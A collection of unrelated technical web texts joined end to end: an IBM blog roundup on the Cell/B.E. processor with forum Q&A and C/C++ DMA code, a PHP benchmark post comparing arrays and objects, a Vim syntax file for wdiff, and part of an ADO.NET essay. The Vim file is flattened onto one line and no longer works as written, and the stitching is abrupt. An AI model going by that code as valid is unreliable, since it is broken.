Cell/B.E. SDK makes leap from v2.1: IBM announced the IBM Software Developers Kit (SDK) for Multicore Acceleration Version 3.0 which allows customer applications to run across a variety of Cell/B.E. processor and x86-based systems. Versions of the SDK and documentation will be available in September and October 2007 -- visit the Cell Resource Center for updates.
IBM also announced the IBM BladeCenter QS21, built for the Cell/B.E. processor, which promises to be one of the world's most energy-efficient blade servers. It, too, will be available in October 2007.
Maryland gets some speed out of the Cell/B.E.: UMaryland and IBM are planning something fast -- the Multicore Computing Center facility that will focus on supercomputing research related to aerospace/defense, financial services, medical imaging, and weather/climate change prediction. The high performance test lab will be based on the Cell/B.E. processor. One of the first challenges of the center will be to make the clusters run effectively together. Made possible by an award from IBM, the center is expected to be ready to go sometime in Fall 2007.
Institute preps recruitment drive for next-gen nanotechnologists: The neophyte National Institute for Nano-Engineering (Nine) wants to "increase American competitiveness in nanotechnology ... [by] exciting them [students] with compelling [engineering and science] problems and offering them the opportunity to make real progress toward solutions." The Sandia Labs-centered coalition Nine intends to use funds from the America Competes Act to popularize nanotechnology in three key areas -- nanoelectronics, nanoenergy generation, and nanomanufacturing.
Dense gravity DOES distort spacetime: NASA Goddard astronomers, using instruments on the European Space Agency's XMM-Newton X-ray observatory and the Japanese/NASA Suzaku X-ray observatory (and peeking at three neutron stars), have detected a distorted iron spectral line. The spectral line from hot iron atoms whirling in a disk around the dense star systems at 40 percent the speed of light was shifted to longer wavelengths and broadened asymmetrically by virtue of the Doppler effect in combination with the "beaming" effect predicted by Einstein's special theory of relativity. So there.
Neural biomech leads the prosthetics revolution: The newest challenge in designing tomorrow's prosthesis is linking the devices to the nervous system so they can be controlled in real time. Researchers at a recent IEEE bioengineering conference discussed: high-performance neural microarray sensor nets implanted in the brain (for piano-playing artificial limbs); algorithms that could offer basic function control with signals from an electroencephalogram monitor worn on the scalp; successful experimentation with single-finger flexing using as few as 30 neurons; how much of the effort should shift from electronics to algorithm development (the finer the movement, the less effective the electronics are, so more may be gained by tuning the math that responds to the signals); various worn and implanted devices that read and analyze brain signals at frequencies from 1 Hz to 10 kHz; and which method is best for capturing those signals.
Save power usage with security designed FOR the device: This commentary weighs the cost of security (applications and systems) on devices (which may be the rule rather than the exception by the time you read this) in terms of how draining they may be on the battery. The author notes that security implementation requires processing power which demands more of the battery on mobile devices. And that "stupid" security (poorly designed, incompatible, or chucked in as an afterthought) tends to draw off battery power with such mechanisms as polling or anything that keeps the CPU in motion. The author goes on to note that "securing applications by any means" will keep mobile device applications extremely inefficient.
Universe has hole, film in eleven billion years: UMinnesota astrophysicists say they've found a billion-light-year-across void in the universe and they don't know why it's there. "What we've found is not normal, based on either observational studies or on computer simulations of the large-scale evolution of the Universe." The region even appears to lack dark matter. The void is in a region of sky in the constellation Eridanus, southwest of Orion. The graphics are worth a look.
Come October, you get real StarWars in space: No, not the missile defense shield. For some reason, NASA has decided to "honor" the 30th year of the movie series franchise by launching the original prop lightsaber into space with the Discovery STS-120 mission in October. Now what did that poor prop do to deserve that?
Nucleus RTOS and EDGE tools target IBM chip: Mentor Graphics is in collaboration with IBM to port Mentor's Nucleus real-time operating system and the EDGE Developer Suite to the Cell/B.E. processor (first target: IBM BladeCenter servers). Included will be the entire range of the Nucleus OS components, the Eclipse-based EDGE Developer Suite, and the EDGE MAJIC JTAG probe, all with Cell/B.E.-specific extensions and features.
Have you seen the Cell/B.E. partner products database?: The growing database just added two new Cell/B.E.-related partner downloads, bringing the current offering to five.
Sharing a love for game development: The Insomniac Games R&D site is publicly sharing its development files (with other game studios and individual developers) in the hopes of getting more high-quality games out there for the PS3. The company promises to feature a large variety of documentation, like tips on how to optimize a certain piece of code or hardware, internal and conference presentations, and articles.
Memory has to be maintained: Weizmann Institute neuroscientists have discovered that long-term memories are not etched in a stable form; the process is more dynamic and on-going and it involves a miniature molecular machine that must run constantly to keep memories going. If you jam the machine, you can erase long-term memories. A synapse protein known as PKMzeta acts as a miniature memory machine -- it keeps memory up and running by changing some facets of the structure of synaptic contacts, but it must be persistently active to maintain this change (which is brought about by learning). A drug can jam the enzymatic machine causing erasure of long-term memories regardless of how long ago they were formed.
Disabling c: Two UKoblenz physicists claim they've used quantum tunneling to make photons travel faster than the speed of light. When they placed two prisms (forming the halves of a cube) together, the microwave photons traveled through them as expected. After they were moved a meter apart, most photons reflected off the first prism and were picked up by a detector; a few, though, appeared to tunnel through the gap separating them as if the two halves were still together. Although they traveled farther, they arrived at the detector at the same time -- therefore, they moved faster than light. The scientists say this is the only violation of special relativity they know of. (One of the best comments to this news story was "Can these scientists get a job at my local transit and get the buses moving beyond their usual glacial pace?")
Light pulses put a new "spin" on quantum supercomputing: The paper, "Quantum Computers Based on Electron Spins Controlled by Ultrafast Off-Resonant Single Optical Pulses," details a scheme to create one of the fastest quantum computers to date by using light pulses to rotate electron spins which serve as quantum bits. This technique improves the overall clock rate of the quantum computer. The researchers combined fast single-bit rotations and fast two-qubit gates (both optically controlled) on a single chip. The chip consists of a loop of cavities (called a "loop-qubus") -- each cavity holds a quantum dot, a small piece of semiconductor that contains a single electron. When you focus an optical pulse at a quantum dot, the electron spins rotate, changing the state of the bit. Very detailed piece of work.
IBM BladeCenter Products and Technology: This Redbooks draft introduces IBM BladeCenter and describes the technology and features of the different chassis, blade server models, and connectivity options; it goes into detail about every major component and provides guidance on networking and storage connectivity. It is an update to an earlier Redpaper and includes new products announced in the first half of 2007, including the BladeCenter HT chassis, the BladeCenter HS21 XM server blade, and a variety of switch modules and expansion cards.
Where would your System p be without LPAR?: The Redbook "Simplifying Logical Partitioning for System i and System p" shows you how logical partitioning (LPAR) provides the capability to run multiple operating systems, each in its own partition, on the same physical processor, memory, and I/O attachment configuration. The publication describes and provides examples of using the 2007 enhancements to the system planning and deployment tools and the processes for planning, ordering, and deploying a partitioned environment on IBM System i and IBM System p configurations.
Implementing Sun Solaris on IBM BladeCenter Servers: This Redpaper describes how to install Solaris on supported BladeCenter servers, either natively or with the use of a Solaris Installation Server and covers how to incorporate the latest patches to Solaris from Sun, plus updated drivers for the Ethernet and RAID devices in the blade servers. It also explains how to implement Fibre Channel storage and how to configure boot from SAN; and you get to learn how to integrate blade servers running Solaris into an IBM Director or SNMP-based management infrastructure.
A quarter of a century and just a few scratches on her: On August 17, the CD turned 25. On August 17, 1982, Royal Philips Electronics manufactured the world's first compact disc at a Philips factory in Langenhagen, outside of Hanover, Germany. (For you youngsters, CDs were how the generation before you captured and carried music.)
Sony's CCB gets Houdini-like special effects software: Side Effects Software Inc. announced today that it is working with Sony to provide Side Effects Software's award-winning Houdini server tools (Houdini Batch and Mantra) to Sony's new Cell Computing Board. Houdini Master is a suite for animation, 3D modeling, visual effects, simulation, compositing, and rendering that was originally designed for the motion picture industry.
Houdini Batch is the non-graphical version of Master that offers users command-line access to the program's features. You can set up a render farm and generate render scene description files and build up large numbers of scenes procedurally at render time using shared assets. Houdini Batch runs with the Houdini Master and Houdini Escape licenses.
Houdini Mantra is a state-of-the-art hybrid scan-line/ray-trace renderer that supports global illumination and point cloud textures.
More rendering for Cell/B.E. and this time it's mental: Academy Award-winning mental image's mental ray high-end rendering software may also be coming to the Sony Cell Computing Board -- the two companies expect to demonstrate their results in the second half of 2008.
From July 3 to August 10, 2007: Also, the "best" Cell/B.E. compiler. Discover how to transfer a variable-length DMA array from PPU to SPU. Just what is the gameOS in PS3? What's the expected behavior when starting more pthreads than SPEs? Can you run a PS3 game on the PS3 Cell/B.E. simulator? Do FC7 and SDK 2.1 play well together? Plus, two questions for you to answer.
This new blog-based column looks at some of the more interesting problems and challenges posed recently in the Cell Broadband Engine Architecture forum.
Problem: Where can I find information about the compilers the Cell/B.E. supports?
Resolved: One of the best compilers for programming the Cell/B.E. processor in C is Cell Superscalar (CellSs), developed at the Barcelona Supercomputing Center. It offers a number of powerful features -- and it's made in Spain!
Problem: I want to copy a DMA array of variable length from the PPU to the SPU, but I always get a bus error when I DMA the array to the SPU. Presumably, this is because the array (the size of which is determined at run time) isn't aligned to a 16-byte boundary. It's possible to circumvent this by using a large (static-size) buffer and memcpy from the array to the buffer, but this clearly is inefficient.
Here's an example that illustrates my problem:
-------------------------hello.h-------------------------

#ifndef HELLO_H
#define HELLO_H

struct __attribute__ ((aligned (16))) context {
    unsigned int size;
    int* test;
};

#endif // HELLO_H

-------------------------hello.cpp-------------------------

#include <iostream>
#include <string>
#include <algorithm>
extern "C" {
#include <libspe.h>
}
#include "hello.h"

extern spe_program_handle_t hello_spu;

int* __attribute__((aligned (16))) test;

// Round i up to the next multiple of 16.
unsigned newsize(unsigned i) {
    unsigned j = 0;
    for (; j <= i; j += 16);
    return j;
}

int main() {
    int size;
    std::cout << "Vector length: ";
    std::cin >> size;

    test = (int*) malloc(newsize(size) * sizeof(int));
    for (int i = 0; i < size; i++) {
        test[i] = i;
    }
    for (int i = 0; i < size; i++) {
        std::cout << "t[" << i << "] = " << test[i] << std::endl;
    }

    context ctx __attribute__ ((aligned (16)));
    ctx.size = newsize(size);
    ctx.test = test;

    speid_t speid = spe_create_thread(0, &hello_spu, &ctx, NULL, -1, 0);
    if (!speid) {
        std::cerr << "Unable to create SPE thread" << std::endl;
        free(test);
        return 1;
    }

    int status = 0;
    spe_wait(speid, &status, 0);

    std::cout << "Squared vector:" << std::endl;
    for (int i = 0; i < size; i++) {
        std::cout << "t[" << i << "] = " << test[i] << std::endl;
    }
    free(test);
    return 0;
}

-------------------------hello_spu.cpp-------------------------

#include <cbe_mfc.h>
#include <spu_intrinsics.h>
#include "hello.h"

volatile context ctx;
volatile int* test;

int main(unsigned long long spu_id, unsigned long long parm) {
    unsigned int tag_id = 0;
    spu_writech(MFC_WrTagMask, -1);  // select all tag groups to be included in query or wait ops
    spu_mfcdma32((void *)(&ctx), (unsigned)parm, sizeof(context), tag_id, MFC_GET_CMD);  // fetch context
    spu_mfcstat(2);  // wait for DMA transfer to complete
    spu_mfcdma32((void *)(test), (unsigned)ctx.test, ctx.size, tag_id, MFC_GET_CMD);  // fetch test vector
    spu_mfcstat(2);  // wait for DMA transfer to complete
    for (int i = 0; i < ctx.size; i++) {
        test[i] = test[i] * test[i];
    }
    spu_mfcdma32((void *)(test), (unsigned int)(ctx.test), ctx.size, tag_id, MFC_PUT_CMD);  // write squared vector back
    spu_mfcstat(2);  // wait for DMA transfer to complete
    return 0;
}
Original questioner: Nevermind, I just found the solution myself. Instead of the normal malloc(), I used this:
test = (int*) malloc(127 + newsize(size) * sizeof(int));
while (((int) test) & 0x7f)
    ++test;
Resolved: You have several ways to do it. You can use malloc_aligned()/free_aligned() wrappers, or do the alignment by hand:

void *p;
void *p_aligned;
p = malloc(127 + size);
p_aligned = (void *)(((uintptr_t)p + 127) & ~(uintptr_t)0x7f);

You have to preserve p, since that's the pointer you'll pass to free() later. (The casts through uintptr_t are needed so the mask arithmetic works regardless of pointer size -- check it for your platform.)
Problem: What is the OS used in the PS3 gameOS partition? I think it's Linux, but which version?
Resolved (from IBM's Dan Greenberg): The game partition of the PS3 runs Sony's proprietary Game OS. The Game OS and its related tools are covered by a strict non-disclosure agreement between Sony and game developers, therefore, discussions of the Game OS are out of scope for any open forum (like the Cell Broadband Engine Architecture forum).
Sony, however, has made it possible to run Linux in a separate partition. There are now several flavors being worked on, with YDL officially supported and FC used to run the most current IBM SDK. That's well within scope here.
Problem: I was reading the Cell Broadband Engine Programming Tutorial and found descriptions of programming models for the Cell/B.E. However, I find it difficult to distinguish between the Function Offload Model, the Computation-Acceleration Model, and the Asymmetric-Thread Runtime Model. What are the distinguishing factors between these three models?
Resolved: The Function Offload Model specifically notes the use of program stubs via IDL. This is mainly used to offload some work from an existing application to the SPEs and does not take full advantage of the parallel capabilities of the CBE. You can see samples of this in /opt/ibm/cell-sdk/prototype/src/tools/idl/samples, though this is not usually used in the SDK.
The Computation-Acceleration Model does not specify how the code is run on the SPEs, just that the SPEs run the computation-intensive code and the PPE acts more as a controller. In this model the SPEs work in parallel (as opposed to the Streaming Model, where they stream data from SPE to SPE).
The Asymmetric-Thread Runtime Model is specific in saying that threads are created on the SPEs using spe_context_create/spe_context_run. This is the model most SDK examples use. It supports the other models since you can use SPE threads with Computation-Acceleration and Streaming, for example.
Problem: Thanks for the reply -- I just need to clear up some doubts. In the Streaming Model, the data moves from one SPE to another, and in each SPE a particular computation is applied to the data? If that's the case, how come the Euler particle example (from the tutorial) states that it is a streaming model? It basically just divides the data equally among the available SPEs; there's no moving of data from SPE to SPE.
Resolved: Sorry for the confusion -- that just goes to show how much the various models overlap and that the distinction between them can be subtle.
The streaming model means that a computational kernel is iterated over a large set of input data. In the case of the Euler example, the data is first parallel pipelined. Then each SPE independently executes in accordance with the streaming model by repeatedly loading a buffer of particles, performing the timestep computation, and storing the results back out to memory.
When processing moves "PPE -> SPE1 -> SPE2 ... SPEn -> PPE" it is a pipeline (serial) programming model.
The computational acceleration model is more like the function-offload model in that the PPE deploys SPEs to accelerate a computational task. Depending on the size of the computational problem, a data streaming technique may be employed by the accelerators.
Problem: What is the expected behavior when starting more pthreads than there are SPEs?
Resolved: In SDK 1.1 the threads would block, so that if six SPEs are in use and you start a seventh thread, it blocks until one of those six exits. SDK 2.1 has the pre-emptive scheduler, so it can time-slice for realtime threads.
Problem: OK, but I don't understand why the preemptive scheduling results in an apparent deadlock between threads. Is there synchronization that must be done to run more threads than SPUs?
Resolved: Are you setting a scheduling policy with spe_create_group() (LIBSPE1) or pthread_attr_setschedpolicy()/pthread_attr_setschedparam() (LIBSPE2)?
Problem: No, I have set no scheduling policy at all. I am referring to the sample program that came with the SDK, in /opt/ibm/cell-sdk/prototype/src/samples/tutorial/simple. By the way, since starting this thread, I have updated to SDK 2.1 and still observe the same behavior.
Resolved: There are some known problems with pre-emption in SDK 2.1 that will be fixed in the next release, so it's possible you're hitting those and that's why the behavior is not consistent.
Problem: Various sites imply that the Cell/B.E. simulator can emulate the PS3 and its games and software. Is this true? How would I do this?
Resolved: The Cell/B.E. simulator simulates only the CPU of the PS3, not the graphical engine or memory system. The simulator gives programmers a system on which to simulate their code; you can, if you wish, dump the data and commands destined for the GPU to a file for further analysis, but not on the fly.
(IBM's Dan Greenberg): The general answer is no. PS3 games depend on having a specific stack -- hardware (including GPU and memory subsystem), firmware, GameOS -- in place. Many of these components are not available for the simulator and/or won't run if they were available. With so many gaps in the system, you're unlikely to get a useful result.
Problem: Does anyone know if the Cell/B.E. SDK 2.1 can be installed in FC7 without any problems?
Resolved: Readers suggest that:
I've had success installing SDK 2.1 on both x86 and PPC (PS3) Fedora 7 hosts.
In my experience, the SDK itself works correctly on Fedora 7 on my laptop (x86) and a PlayStation 3. However, you could encounter some issues while cross-compiling applications for a Cell/B.E. system. The SDK system root (/opt/cell/sysroot) contains libraries built for Fedora Core 6, namely glibc 2.5, and cross-compiling will link against these libraries. While these applications seem to run on a Cell/B.E. system with Fedora 7, some issues can arise while debugging -- I had a hard time debugging pthreads before discovering this. That said, you can copy the libraries from Fedora 7 into the SDK system root. Personally, I made an NFS share of the filesystem root on my PS3 and mounted it on my laptop over /opt/cell/sysroot.
I have successfully installed SDK 2.1 on Fedora 7. I also had problems downloading the packages from BSC, and then got stuck when trying to install the Eclipse plugin. In the end I didn't use the update function, but copied the files manually to /usr/share/eclipse.
Ed: This is a really good entry to read if you're having problems with this particular situation, since the readers ask and answer more detailed questions than are covered here.
Source: https://www.ibm.com/developerworks/community/blogs/powerarchitecture/date/200708?lang=en
PHP: Use associative arrays!
Benchmark environment
My test system is a Lenovo X1 Carbon 2017 Edition, i5-7300U CPU @ 2.60GHz, 16 GB of RAM, running Kubuntu 18.04. The PHP version is 7.2.5-0ubuntu0.18.04.1. XDebug is disabled. (Always do that before running benchmarks!) I have as much background processing turned off as I could manage, though on modern systems runtime optimizations mean there will always be some variation and jitter.
You will almost certainly get different absolute numbers than I do but the relative values should be about the same.
Associative arrays (Baseline)
The baseline test looks like this:
<?php

declare(strict_types=1);
error_reporting(E_ALL | E_STRICT);

const TEST_SIZE = 1000000;

$list = [];
$start = $stop = 0;

$start = microtime(true);
for ($i = 0; $i < TEST_SIZE; ++$i) {
    $list[$i] = [
        'a' => random_int(1, 500),
        'b' => base64_encode(random_bytes(16)),
    ];
}

ksort($list);

usort($list, function($first, $second) {
    return [$first['a'], $first['b']] <=> [$second['a'], $second['b']];
});

$stop = microtime(true);
$memory = memory_get_peak_usage();
printf("Runtime: %s\nMemory: %s\n", $stop - $start, $memory);
That is, we build an array of 1 million items, where each item is an associative array containing an int and a short string. This "anonymous struct" is very typical of the type of data structure I'm talking about, which is often assigned to a private property within an object and only accessed within it. (Although some systems like to expose these anonymous structs as though they were an API, which is one of the most developer-hostile API designs I have ever seen. You know who you are.) 1 million items is somewhat larger than a typical use case but we want to stress test it, so go big or go home.
The goal is to measure the memory used by all of those nested arrays as well as the time it takes to process them. For that, we're sorting the array twice, once by the key (which should be a no-op) and once by the array itself, using a custom sort function.
As a second test, I also want to check the serialization size. These giant lookup tables are often built once and serialized to a database for cache lookup, so knowing the trade off there is also useful. For that we use this slightly different script:
<?php

declare(strict_types=1);
error_reporting(E_ALL | E_STRICT);

const TEST_SIZE = 1000000;

$list = [];
$start = $stop = 0;

$start = microtime(true);
for ($i = 0; $i < TEST_SIZE; ++$i) {
    $list[$i] = [
        'a' => random_int(1, 500),
        'b' => base64_encode(random_bytes(16)),
    ];
}

$ser = serialize($list);
unserialize($ser);

$stop = microtime(true);
$memory = memory_get_peak_usage();
printf("Runtime: %s\nMemory: %s\nSize: %s\n", $stop - $start, $memory, strlen($ser));
To account for natural jitter in the process, I ran each test once to prime it (although on the CLI that shouldn't matter, but it doesn't hurt). Then I run three more times in a row and average the results. Here's the results for our baseline test:
Associative array (Sorting)
Associative array (Serialize)
So: about 9.4 seconds and half a gigabyte of memory to work with associative arrays, and the serialized form is 68 MB. The runtime is pretty stable and the memory usage is constant, as expected. (The slight variation is most likely due to randomly generated numbers of different lengths.) Those are the values to beat.
stdClass
For completeness, let's switch to a stdClass object. I predicted this would be about the same, as structurally stdClass objects are basically associative arrays that pass by handle instead of by value. Here's the new test (the boilerplate start and end parts omitted):
for ($i = 0; $i < TEST_SIZE; ++$i) {
    $o = new stdClass();
    $o->a = random_int(1, 500);
    $o->b = base64_encode(random_bytes(16));
    $list[$i] = $o;
}

ksort($list);

usort($list, function($first, $second) {
    return [$first->a, $first->b] <=> [$second->a, $second->b];
});
And here's the data:
stdClass (Sorting)
stdClass (Serialize)
Huh. I expected the serialized version to be a bit bigger, as it needs to store the string "stdClass" over and over again. I didn't expect it to also be measurably slower and less memory-efficient than an associative array. It's not a massive difference, and at smaller cardinality it probably wouldn't be measurable, but it's definitely there.
Why does anyone use stdClass again?
Object with public properties
Now let's get into the real test. In this case we'll predefine a class to use for our list items, with two public properties. PHP 7.2 doesn't support typed properties (although it looks like an upcoming version probably will), but it does still do various optimizations to object structures when it knows the properties in advance. Let's see if those optimizations pan out in practice.
Here's our test code:
class Item {
    public $a;
    public $b;
}

for ($i = 0; $i < TEST_SIZE; ++$i) {
    $o = new Item();
    $o->a = random_int(1, 500);
    $o->b = base64_encode(random_bytes(16));
    $list[$i] = $o;
}

ksort($list);

usort($list, function($first, $second) {
    return [$first->a, $first->b] <=> [$second->a, $second->b];
});
And the data:
Public properties (Sorting)
Public properties (Serialize)
BOOM! For sorting, a proper classed object is measurably faster than an array, but the big difference is in memory: it uses half as much memory as the array version did. Half.
Serialization didn't fare quite so well. It's about on par with stdClass time-wise but a bit more efficient space-wise. I strongly suspect that's because the string "Item" is shorter than "stdClass", which gets repeated over and over in the serialized value. That's something to note when dealing with a namespaced class, as then the serialized class name can be quite long.
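You can see that per-object overhead directly in PHP's serialization format, where the class name and its length lead every serialized object. A tiny demo (the two-property Item and its values are just for illustration):

```php
<?php

class Item
{
    public $a;
    public $b;
}

$o = new Item();
$o->a = 1;
$o->b = 'xy';

// The class name ("Item", length 4) heads the serialized object:
echo serialize($o), "\n";
// O:4:"Item":2:{s:1:"a";i:1;s:1:"b";s:2:"xy";}
```

A namespaced class such as App\Data\Item would have its fully-qualified name written out the same way in every one of the million entries, which is exactly where the size cost of long class names comes from.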
Object with private properties
A lot of people (like yours truly) preach against using public properties in favor of protected properties and accessor methods. That does introduce more method calls into our test, though. How will that fare?
Here's the new test code:
class Item {
    protected $a;
    protected $b;

    public function __construct(int $a, string $b) {
        $this->a = $a;
        $this->b = $b;
    }

    public function a() : int {
        return $this->a;
    }

    public function b() : string {
        return $this->b;
    }
}

for ($i = 0; $i < TEST_SIZE; ++$i) {
    $list[$i] = new Item(random_int(1, 500), base64_encode(random_bytes(16)));
}

ksort($list);

usort($list, function(Item $first, Item $second) {
    return [$first->a(), $first->b()] <=> [$second->a(), $second->b()];
});
And the data:
Private properties (Sorting)
Private properties (Serialize)
As predicted, adding methods to the mix slows it down a bit. The memory usage is very close to the public property version. Somehow the serialized version got a little bit slower and larger, but not dramatically. Again, at lower cardinality it would probably not be measurable.
Anonymous classes
Of course, some people are allergic to defining classes. I don't know why, but they still view it as a slow and expensive thing to do. Maybe they're concerned about file count (given that PHP by convention uses a file-per-class structure, although nothing in the language mandates that). For completeness, though, let's define an anonymous class inline and see how it measures up. We'll only do the public-property version, as we know that adding methods will slow it down a tad.
One thing to note, however, is that anonymous classes cannot be serialized. If you need to serialize your data structure then anonymous classes are a no-go. We'll skip that test, of course.
Here's the code:
for ($i = 0; $i < TEST_SIZE; ++$i) {
    $o = new class(random_int(1, 500), base64_encode(random_bytes(16))) {
        public $a;
        public $b;

        public function __construct(int $a, string $b) {
            $this->a = $a;
            $this->b = $b;
        }
    };
    $list[$i] = $o;
}
And the data:
Anonymous class (Sorting)
Right in the same neighborhood as the named class, give or take. So for about the same performance and no ability to serialize it, you don't need to define a class by name. I'm sure someone will argue that is a good trade off but that someone would not be me.
Summary
Here's our final data, showing the percent change relative to our baseline for each value (negative number means decrease, which is good):
Summary (Sorting)
Summary (Serialize)
What can we conclude from all of this?
First off, a reminder that we're dealing with a cardinality of 1 million here. That means if your cardinality is 4, odds are you won't notice an earth-shattering difference no matter what you do. However, it's still good to get into good habits in case your cardinality does grow considerably. In just about every other situation I can think of, named classes win. Their memory usage is half that of a corresponding array. The optimizations the engine can do when it knows up front what the structure of your data is going to be are massive and pay huge dividends in memory consumption. They're also over 10% faster. The only downside is when serializing them, where there is an added cost in time, memory, and stored size. When we also consider that a classed object is far more self-documenting than an associative array, gives IDEs the ability to auto-complete for you, and gives you a place to include additional documentation (which you should include), it's one of the clearest wins I've seen in PHP.
In other words, if you're one of those people who claims that "good code is self-documenting, you don't need comments", and you're not using a classed object, then you're not just wrong, you're a hypocrite who's also wrong. Don't be that person.
The question of public properties vs methods is, I would argue, open. They do offer a more structured, self-documenting, more flexible approach but at the same time do have a hefty CPU penalty over associative arrays. (They still destroy arrays on memory, though.) Whether that is a good trade off or not depends on your use case. My default recommendation would be, when we're talking about what is essentially a private class, use public properties for the main data but don't feel shy about adding additional methods to the object if you want to compute stuff off of it, or it makes sorting easier, or it somehow otherwise is helpful for your use case. Putting a constructor on the class so you can initialize it in a single line is probably a good idea, and I expect would be a wash performance-wise.
As another consideration, it's common these days for larger frameworks to generate code based on plugin information and store that on disk not as a serialized string but as a generated PHP class that can then be just loaded like any other. (Think Dependency Injection Containers, Event Dispatchers, theme systems where you can register template plugins, etc.) In that case the serialization point is moot and you have absolutely no excuse for not using a named class. Generating out a big nested associative array into your compiled code is just flat out inexcusably wasteful. Don't do that. Stop it.
Although I only ran the tests on PHP 7.2, I'm reasonably confident these results will hold for PHP 7.0 and later. It's possible they would be different on PHP 5, but since all versions of PHP 5 will be fully unsupported within 6 months, I really don't care whether they're applicable there.
tl;dr: Use named classes with public properties for big internal data structures. If you're still using nested associative arrays for that, You're Doing It Wrong(tm).
I always start with arrays for quick prototyping, then I move back to objects for storing the same data. Not only because I suspected it would be faster (because of the class definition) but because the objects I'm sharing the data with have their own methods that know how to deal with it. Here is an example where I moved array structures into their own class: the code is much nicer, and it runs a bit faster if you measure a few million iterations.
Interesting article that confirms my theory :D, thanks for writing it.
Nice! Yeah, the ability to encapsulate behavior is one of the most obvious benefits of a class but there's been a general belief in PHP for years that doing so was more expensive than doing it "manually". That may have been true once, but it's definitely not true today. In fact quite the opposite.
An addendum, as a few people have pointed out to me on Twitter:
This applies to runtime behavior. PHP has another optimization where, if you define an array as a const, it gets placed in shared memory with the code, so the net memory cost to each process using that array is 0.
That's really only applicable if:
In that case, a const big nested array may indeed be better both for CPU and memory.
The runtime builder for that compiled code, though, is still better off using objects for memory efficiency so that you can produce that compiled code.
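For illustration, a minimal sketch of the const case (the container class and its service entries are made up): a nested array declared as a class constant lives in opcache's shared memory, so each process pays essentially nothing extra for it.

```php
<?php
class CompiledContainer
{
    // Baked into shared memory along with the compiled code.
    const SERVICES = [
        'logger' => ['class' => 'FileLogger', 'args' => ['/tmp/app.log']],
        'mailer' => ['class' => 'SmtpMailer', 'args' => ['localhost']],
    ];
}

// Read-only lookups; modifying the data would mean copying it anyway.
echo CompiledContainer::SERVICES['logger']['class'], "\n"; // FileLogger
```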
As always, context matters. :-)
Great write up, Larry. I won’t fight you. You made a good argument.
Oh good. We have enough things to fight about. I'd hate to add programming optimization to the list. :-)
Nice benchmark !
And what about implementing Serializable on the named class to still store it as an associative array?
Is it the best win-win combo ? Of course we need to ask if defining serialization for simple data struct is relevant 😊.
My guess is it would be slower because it has to call serialize/deserialize in user-space for each class. It might end up being smaller but the performance cost is likely not worth it. That said, I haven't tried.
How about using array_multisort() instead of usort()?
Running on a mac book pro, 2.2GHz Intel Core i7, 16GB, listing Av. of 3 runs:
Associative array (Sorting)
Object with public properties (sorting):
a tradeoff between memory and runtime ...
Interesting observation! If you're sorting an array, yes, that would make a big difference. However, the purpose of usort() here was to provide a direct comparison between objects and arrays, so they had to be used in the same way. That meant usort(), so that we could compare the property access in each. I didn't much care about the sorting itself; sorting was just an easy way to call $array['a'] and $object->a a few zillion times. :-)
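For the curious, here's a reconstruction of the shape of that comparison (not the author's actual benchmark code); the two callbacks are structurally identical, so any timing difference comes down to $x['a'] versus $x->a:

```php
<?php
class Rec
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }
}

$arrays  = [['a' => 3], ['a' => 1], ['a' => 2]];
$objects = [new Rec(3), new Rec(1), new Rec(2)];

// Same sort, two access styles.
usort($arrays,  function ($x, $y) { return $x['a'] <=> $y['a']; });
usort($objects, function ($x, $y) { return $x->a <=> $y->a; });

echo $arrays[0]['a'], ' ', $objects[0]->a, "\n"; // 1 1
```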
This is rather old, but here's a post from Nikita Popov explaining the difference in storage in PHP 5.4:
The structs have changed dramatically in PHP 7, but the basic optimization he describes is still with us, and is the reason for these results.
Some more recent posts on the topic, too:
Hi there:
I really tried to use model classes but it is impractical.
Let's say we want to json_serialize. OK, that's not a problem. But what if we have a field that is composed of another model?
Serializing it is not fun. Deserializing (from JSON) is a bigger challenge, though, because the system doesn't understand that the field $typeCustomer is an object and deserializes it as stdClass; then every method attached to TypeCustomer fails.
upvote for me please?
Very good post. I often had these issues with associative arrays while writing the code for websites.
Source: https://steemit.com/php/@crell/php-use-associative-arrays-basically-never
" Vim syntax file " Language: wDiff (wordwise diff) " Maintainer: Gerfried Fuchs <alfie@ist.org> " Last Change: 25 Apr 2001 " URL: " " Comments are very welcome - but please make sure that you are commenting on " the latest version of this file. " SPAM is _NOT_ welcome - be ready to be reported! " For version 5.x: Clear all syntax items " For version 6.x: Quit when a syntax file was already loaded if version < 600 syn clear elseif exists("b:current_syntax") finish endif syn region wdiffOld start=+\[-+ end=+-]+ syn region wdiffNew start="{+" end="+}" " Define the default highlighting. " For version 5.7 and earlier: only when not done already " For version 5.8 and later: only when an item doesn't have highlighting yet if version >= 508 || !exists("did_wdiff_syn_inits") let did_wdiff_syn_inits = 1 if version < 508 let did_wdiff_syn_inits = 1 command -nargs=+ HiLink hi link <args> else command -nargs=+ HiLink hi def link <args> endif HiLink wdiffOld Special HiLink wdiffNew Identifier delcommand HiLink endif let b:current_syntax = "wdiff"
Source: http://opensource.apple.com/source/vim/vim-44/runtime/syntax/wdiff.vim
Dino Esposito
April 26, 2001
Recently, I've thrown myself into the somewhat evangelical task of bringing ADO.NET to the masses. While debating the intrinsic beauty of the ADO.NET object model, I find a nearly insurmountable hurdle in the perception of its similarity with ADO, from whose object model it hails.
The majority of the questions focus around the key improvements in ADO.NET.
The disconnected model of computing? "Do you mean the model that ensures high levels of scalability for Web applications? Oh my, it was already available since the times of ADO 2.0."
Tight integration with XML? "You're kidding, right? XML and ADO celebrated their wedding in ADO 2.1 and reinforced the pact with ADO 2.5. Indeed, it was a very successful union."
The seamless integration with the rest of the framework? "What kind of framework are you talking about? Is it COM or COM+, or perhaps you are referring to MFC?"
The word "framework," though, is the first successful attempt to break the wall of "interested coldness"—if not "hot apathy"—that sometimes surrounds and welcomes presentations about ADO.NET.
This doesn't mean that developers are really unconcerned about data access in general, and ADO.NET in particular. They would rather hear about new prodigious features and astonishing strengthening of existing services. Instead, to program with ADO.NET, they end up using connections and commands working against data providers. They grab static snapshots of records and ask the runtime to reconnect and submit changes when they're done. They persist their content to XML streams.
So people reasonably ask what's really new with ADO.NET. And the subliminal sensation that nothing is really new progressively grows as the presentation rolls out and unveils what's under the ADO.NET covers.
Again, framework is indeed the word that represents the first crack in an otherwise plain and solid skepticism that can be easily observed by you, the ADO.NET presenter.
ADO.NET has unprecedented integration with the surrounding system SDK (in this case, the .NET Framework). Such seamless integration goes from the design patterns and type system of the base class libraries all the way up through Web Services and ASP .NET. Regardless of your programming model, as long as you stay in .NET, ADO.NET classes are the preferred way to go for data access.
